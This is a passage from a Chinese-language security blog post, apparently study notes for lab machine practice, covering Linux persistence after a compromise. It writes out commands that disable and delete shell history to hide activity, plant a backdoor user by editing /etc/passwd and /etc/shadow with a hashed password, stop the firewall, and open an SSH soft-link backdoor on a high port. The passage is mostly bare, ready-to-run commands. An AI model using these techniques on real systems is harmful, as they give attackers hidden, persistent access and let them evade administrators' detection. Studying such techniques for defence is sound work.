<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set +o history  //开头带一个空格的将不会被记录</span><br><span class="line">set -o history</span><br><span class="line">history -d 220(set +o history语句所在的行数)</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123145958114.png" alt="image-20240123145958114"></p>
<p>使用文件创建用户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/passwd</span><br><span class="line">在后面添加qing:x:1001:1001::/qing:/bin/bash</span><br><span class="line">vim /etc/shadow</span><br><span class="line">在后面添加qing:$1$g2KIWGC6$9xDPCB2Ok9D4MCaVbju2s.（密码）:19421:0:99999:7:::</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl passwd 密码</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123153222315.png" alt="image-20240123153222315"></p>
<p>可以用su进行登入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">su qing</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zhenghuangfei/tu@main//imgimage-20240123153301498.png" alt="image-20240123153301498"></p>
<h4 id="ssh软连接后门"><a href="#ssh软连接后门" class="headerlink" title="ssh软连接后门"></a>ssh软连接后门</h4><p>关闭防火墙</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo systemctl stop firewalld</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oPort=1234 </span><br><span class="line">ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345</span><br><span class="line">ssh root@192.168.1.148 -p12345</span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/01/19/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" data-id="clrmsspnz0005j0u42nmeebf0" class="article-share-link">分享</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/01/24/1-medium-socnet-ova%E9%9D%B6%E6%9C%BA/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">上一篇</strong>
      <div class="article-nav-title">
        
          1.medium_socnet.ova靶机easy_cloudantivirus靶机渗透练习
        
      </div>
    </a>
  
  
    <a href="/2024/01/17/%E7%BD%91%E9%A1%B5%E7%8A%B6%E6%80%81%E7%A0%81/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">下一篇</strong>
      <div class="article-nav-title">网页状态码</div>
    </a>
  
</nav>

  
</article>



</section>
        
          <aside id="sidebar">
  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <h1 class="blog-title">Hexo</h1>
    <h2 class="blog-subtitle"></h2>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分类</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>标签</li>
          </a>
        
    </ul>
  </div>
</div>

  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="https://avatars0.githubusercontent.com/u/20333903?v=3&amp;s=460">
    <h2 class="author">John Doe</h2>
    <h3 class="description"></h3>
    <div class="count-box">
      <a href="/archives"><div><strong>65</strong><br>文章</div></a>
      <a href="/categories"><div><strong>0</strong><br>分类</div></a>
      <a href="/tags"><div><strong>1</strong><br>标签</div></a>
    </div>



    <div class="social-link">
      
        <a class="hvr-bounce-in" href="http://github.com/ShanaMaid" target="_blank" title="Github">
          Github
        </a>
      
    </div>

    <div class="friend-link">
      <h2>友情链接</h2>
      
        <a class="hvr-bounce-in" href="http://blog.shanamaid.top/" target="_blank" title="ShanaMaid">
          ShanaMaid
        </a>
      
    </div>
  </div>
</div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy;2023 - 2024 John Doe<br>
      由<a href="http://hexo.io/" target="_blank">Hexo</a>强力驱动 | 
      主题-<a target="_blank" rel="noopener" href="https://github.com/ShanaMaid/hexo-theme-shana">Shana</a>
      
    </div>
    
  </div>
</footer>
    </div>
    

<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="//apps.bdimg.com/libs/wow/0.1.6/wow.min.js"></script>
<script>
new WOW().init();
</script>   


  
<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">

  
<script src="/plugin/fancybox/jquery.fancybox.pack.js"></script>




  
<link rel="stylesheet" href="/plugin/galmenu/GalMenu.css">

  
<script src="/plugin/galmenu/GalMenu.js"></script>

  <div class="GalMenu GalDropDown">
      <div class="circle" id="gal">
        <div class="ring">
          
            <a href="/" title="" class="menuItem">首页</a>
          
            <a href="/tags" title="" class="menuItem">标签</a>
          
            <a href="/categories" title="" class="menuItem">分类</a>
          
            <a href="/archives" title="" class="menuItem">归档</a>
          
            <a href="/xxxxxxxxx" title="" class="menuItem">xxx</a>
          
            <a href="/xxxxxxx" title="" class="menuItem">xxxx</a>
          
        </div>
        
          <audio id="audio" src="#"></audio>
        
      </div> 
</div>
<div id="overlay" style="opacity: 1; cursor: pointer;"></div>
  <script type="text/javascript">var items = document.querySelectorAll('.menuItem');
    for (var i = 0,
    l = items.length; i < l; i++) {
      items[i].style.left = (50 - 35 * Math.cos( - 0.5 * Math.PI - 2 * (1 / l) * i * Math.PI)).toFixed(4) + "%";
      items[i].style.top = (50 + 35 * Math.sin( - 0.5 * Math.PI - 2 * (1 / l) * i * Math.PI)).toFixed(4) + "%"
    }</script>
<script type="text/javascript">
  $(document).ready(function() {
    $('body').GalMenu({
      'menu': 'GalDropDown'
    })
  });
</script>

  <section class="hidden-xs"> 
  <ul class="cb-slideshow"> 
    <li><span>苟利</span></li> 
    <li><span>国家</span></li> 
    <li><span>生死以</span></li> 
    <li><span>岂能</span></li> 
    <li><span>祸福</span></li> 
    <li><span>趋避之</span></li> 
  </ul>
</section>

<script src="/js/script.js"></script>




  </div>
</body>
</html>